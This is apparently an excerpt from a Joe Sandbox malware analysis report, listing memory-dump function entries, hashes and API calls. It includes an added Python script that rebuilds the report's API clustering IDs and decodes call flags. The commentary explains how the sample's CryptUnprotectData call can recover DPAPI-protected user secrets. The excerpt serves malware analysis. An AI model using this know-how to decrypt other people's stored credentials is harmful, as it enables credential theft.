                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: dec08a625e8e14bd2e47dec7c1cf3db2151d580d1fd73563f541861959016511
                                    • Instruction ID: 230e48421756c09bdc13ee2ea01724d8b59b44dde0308d52388d823122923a38
                                    • Opcode Fuzzy Hash: dec08a625e8e14bd2e47dec7c1cf3db2151d580d1fd73563f541861959016511
                                    • Instruction Fuzzy Hash: DB41F770A00A28AFDB24DB58CC99F9BB7B4BB48702F4041D9E608EB290D7716E85CF50
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00089B84
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00089BA3
                                    • LocalFree.KERNEL32(?), ref: 00089BD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: ba4bf3870d31db20cdaf6212d9014d7613d7ceb9060ef120a9cb6ba0e06b528c
                                    • Instruction ID: 4c789bd576edd47d429ae074f4e2edc2e5997c8090405b94ae8a95450a04800b
                                    • Opcode Fuzzy Hash: ba4bf3870d31db20cdaf6212d9014d7613d7ceb9060ef120a9cb6ba0e06b528c
                                    • Instruction Fuzzy Hash: 6611A8B4A00209DFDB04DFA4D989EAE77B5FB88304F104558E91597350D774AE10CBA1
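The five function entries above (CryptBinaryToStringA; CryptStringToBinaryA/LocalAlloc/LocalFree; GetProcessHeap/RtlAllocateHeap/GetTimeZoneInformation/wsprintfA; CoCreateInstance/MultiByteToWideChar; CryptUnprotectData/LocalAlloc/LocalFree) each carry a Similarity "API ID" that can be rebuilt from the APIs list alone, which is what makes it useful for clustering functions across samples. The script below is an added example and not part of the Joe Sandbox report. Its input is the API lines copied verbatim from these entries. The API ID reconstruction (CamelCase split, drop of the A/W suffix, grouping by word frequency, alphabetical join with `$`) and the stop-word list `Get`, `Rtl`, `Co`, `To` are inferred from these five entries only and are not a documented Joe Sandbox algorithm; the flag constants are the Windows SDK values. It decodes the flag arguments the plugin recovered: `0x1` and `0x40000001` are `CRYPT_STRING_BASE64` (the latter also `CRYPT_STRING_NOCRLF`), `0x40` on `LocalAlloc` is `LMEM_ZEROINIT`, and `CryptUnprotectData` is called with a NULL description, NULL optional entropy and `dwFlags` 0, so any DPAPI blob protected in the same user context can be recovered without a further secret. Caveat: the argument lists are stack snapshots; `?` marks an unresolved slot, and values such as `00084EEE` in pointer positions are not reliable parameter values, so only the flags slot is interpreted here.

```python
import re
from collections import Counter

# Constructed input: the "APIs" lines of five function entries on this page,
# keyed by the address of the first call. Copied verbatim from the report.
ENTRIES = {
    "00098EC0": [
        "CryptBinaryToStringA.CRYPT32(00000000,00085184,40000001,00000000,00000000,?,00085184), ref: 00098EC0",
    ],
    "00089AEF": [
        "CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089AEF",
        "LocalAlloc.KERNEL32(00000040,?,?,?,00084EEE,00000000,?), ref: 00089B01",
        "CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089B2A",
        "LocalFree.KERNEL32(?,?,?,?,00084EEE,00000000,?), ref: 00089B3F",
    ],
    "00097A63": [
        "GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00D3F1E8,00000000,?,000A0E10,00000000,?,00000000,00000000), ref: 00097A63",
        "RtlAllocateHeap.NTDLL(00000000), ref: 00097A6A",
        "GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00D3F1E8,00000000,?,000A0E10,00000000,?,00000000,00000000,?), ref: 00097A7D",
        "wsprintfA.USER32 ref: 00097AB7",
    ],
    "00093758": [
        "CoCreateInstance.COMBASE(0009E118,00000000,00000001,0009E108,00000000), ref: 00093758",
        "MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 000937B0",
    ],
    "00089B84": [
        "CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00089B84",
        "LocalAlloc.KERNEL32(00000040,00000000), ref: 00089BA3",
        "LocalFree.KERNEL32(?), ref: 00089BD3",
    ],
}

# "Api.MODULE(args), ref: addr"; the parentheses are absent for wsprintfA.
API_LINE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Assumption inferred from the five entries above, not a documented rule:
# these CamelCase fragments never appear in an API ID.
STOPWORDS = {"Get", "Rtl", "Co", "To"}

# Windows SDK flag bits, keyed by (API base name, index of the flags argument
# in the SDK prototype).
FLAG_FIELDS = {
    ("CryptStringToBinary", 2): {0x1: "CRYPT_STRING_BASE64"},
    ("CryptBinaryToString", 2): {0x1: "CRYPT_STRING_BASE64", 0x40000000: "CRYPT_STRING_NOCRLF"},
    ("LocalAlloc", 0): {0x40: "LMEM_ZEROINIT"},
    ("CryptUnprotectData", 5): {0x1: "CRYPTPROTECT_UI_FORBIDDEN", 0x4: "CRYPTPROTECT_LOCAL_MACHINE"},
}


def parse_api_line(line):
    """Split one report API line into api, module, argument list and ref address."""
    m = API_LINE.match(line.strip().lstrip("•").strip())
    if not m:
        raise ValueError("unrecognised API line: %r" % line)
    args = m.group("args")
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args.split(",") if args else [], "ref": m.group("ref")}


def base_name(api):
    """Strip the ANSI/Unicode suffix: CryptStringToBinaryA -> CryptStringToBinary."""
    return re.sub(r"(?<=[a-z])[AW]$", "", api)


def split_words(api):
    """CamelCase split; an all-lowercase name such as wsprintf stays one word."""
    return re.findall(r"[A-Z][a-z0-9]*|[a-z][a-z0-9]*", base_name(api))


def api_id(lines):
    """Rebuild the Similarity 'API ID': count each word over all calls, group by
    count (most frequent group first), sort each group, join groups with '$'."""
    counts = Counter()
    for line in lines:
        for word in split_words(parse_api_line(line)["api"]):
            if word not in STOPWORDS:
                counts[word] += 1
    by_count = {}
    for word, n in counts.items():
        by_count.setdefault(n, []).append(word)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def decode_flags(line):
    """Name the set bits of the call's flags argument. None when the API has no
    flags field in FLAG_FIELDS or the plugin printed '?' for that slot."""
    call = parse_api_line(line)
    for (api, idx), names in FLAG_FIELDS.items():
        if base_name(call["api"]) == api and idx < len(call["args"]) and call["args"][idx] != "?":
            value = int(call["args"][idx], 16)
            return [name for bit, name in sorted(names.items()) if value & bit]
    return None


if __name__ == "__main__":
    for first_ref, lines in ENTRIES.items():
        print(first_ref, api_id(lines))
        for line in lines:
            print("    ", parse_api_line(line)["api"], decode_flags(line))
```

Running it reproduces the five API IDs printed under Similarity above; if a future report entry disagrees, the stop-word list is the first assumption to revisit.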
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 'f/
                                    • API String ID: 0-129831727
                                    • Opcode ID: 09b24a2503248853ef87423460e1c2b54273d54d29293a84604ede4cc89ffe02
                                    • Instruction ID: 5f85f748e71590a4198543a97579733b73ec601cc8355374edf16c1a42c042d7
                                    • Opcode Fuzzy Hash: 09b24a2503248853ef87423460e1c2b54273d54d29293a84604ede4cc89ffe02
                                    • Instruction Fuzzy Hash: 7BB22BF3A0C204AFE704AE2DEC8577ABBE9EB94320F16453DEAC4C3744E93558158697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Y!}
                                    • API String ID: 0-1495517983
                                    • Opcode ID: 38cc195ace011716ce3f4ddcb24f6300a8a6bb5930552daf220efb8df081d1a8
                                    • Instruction ID: 281d0be4ab5ac0afe525990387e9e9a7526bda31fa1dfd58079c47b4f3808043
                                    • Opcode Fuzzy Hash: 38cc195ace011716ce3f4ddcb24f6300a8a6bb5930552daf220efb8df081d1a8
                                    • Instruction Fuzzy Hash: E852F6F360C2009FE304AE2DEC8577ABBE5EF94620F1A853DEAC4C3744E63599058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !y{n
                                    • API String ID: 0-69970170
                                    • Opcode ID: 874926a40bc695dd0dafebd87a51881a4744054cadd4c14b6da697486660263e
                                    • Instruction ID: 52bea15aeeb1b0e4750eab6eac15e8685fe0d56d66fd3315479c821e88714771
                                    • Opcode Fuzzy Hash: 874926a40bc695dd0dafebd87a51881a4744054cadd4c14b6da697486660263e
                                    • Instruction Fuzzy Hash: 1A6128F3B082006FF3086969EC59B7B77D6DBD4320F16463DEB8AC3780E87558058296
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: anc~
                                    • API String ID: 0-435866895
                                    • Opcode ID: 1f13f18fc4aabbf3847c5532115a953c9c82549d83bed42085b246f80f7d854e
                                    • Instruction ID: 3858fd35b48e791749f87fcc4c84f82c67e4284aa16fcb196d0abf4bb0342174
                                    • Opcode Fuzzy Hash: 1f13f18fc4aabbf3847c5532115a953c9c82549d83bed42085b246f80f7d854e
                                    • Instruction Fuzzy Hash: 065136B3A182149FE304BF2DEC85BBAB7D4EF94710F0A493DEAC4C3740E97499048696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: t4m
                                    • API String ID: 0-1470551393
                                    • Opcode ID: 15f9df6ab923aa0415e64fae402c1eb0792091f003504472e86df6d98e6a2281
                                    • Instruction ID: 78c5590eb286d5617dfa0f5923d19a23224d9f60d067bda8f5bb82e7f7f37962
                                    • Opcode Fuzzy Hash: 15f9df6ab923aa0415e64fae402c1eb0792091f003504472e86df6d98e6a2281
                                    • Instruction Fuzzy Hash: 64519FF39087149FE3107E19EC8576AFBE9EB94320F1B492DDAC883340EA7558448797
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7c31e7e14ee40f2bc265a11a4067a0773529b107535d59cd427307e2ea184409
                                    • Instruction ID: dacd750cc887fad6802b9a25b3c2dcff418ee9a6a3c792dbdb2d8d2720f402b4
                                    • Opcode Fuzzy Hash: 7c31e7e14ee40f2bc265a11a4067a0773529b107535d59cd427307e2ea184409
                                    • Instruction Fuzzy Hash: B65126F3E086184FE3046A3DDC88336BA99DB94320F2B873DDE98977C4E97919448281
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2989e8bd46d6a0a736c81c589b828d947bfb7a7d2e5ba83ca2a25822237e2867
                                    • Instruction ID: c8484433e9938ccb66e67bc6397bdc97bc9c08919cd15b6158c3f6e2dc9f3e26
                                    • Opcode Fuzzy Hash: 2989e8bd46d6a0a736c81c589b828d947bfb7a7d2e5ba83ca2a25822237e2867
                                    • Instruction Fuzzy Hash: 4C5145B26083089FE308BE2DEC8577AF7D5DB90710F0A853CDAC487744FA35A9158687
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 763c4e15c1690abfdbb798089345c1704b90078a1f19ac4805925b0307e0ba1b
                                    • Instruction ID: 258711f4fe6444757cc02c9235391e0ead947fce26558c66adcb855934484fcb
                                    • Opcode Fuzzy Hash: 763c4e15c1690abfdbb798089345c1704b90078a1f19ac4805925b0307e0ba1b
                                    • Instruction Fuzzy Hash: 955114F3A087149FE3046E29ECC566ABBD9EFD4760F2B863DE6D497340D53948018782
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 62a5843d9c34820c897cf532d0a037371490d7953527180a91869ad6d61a2abd
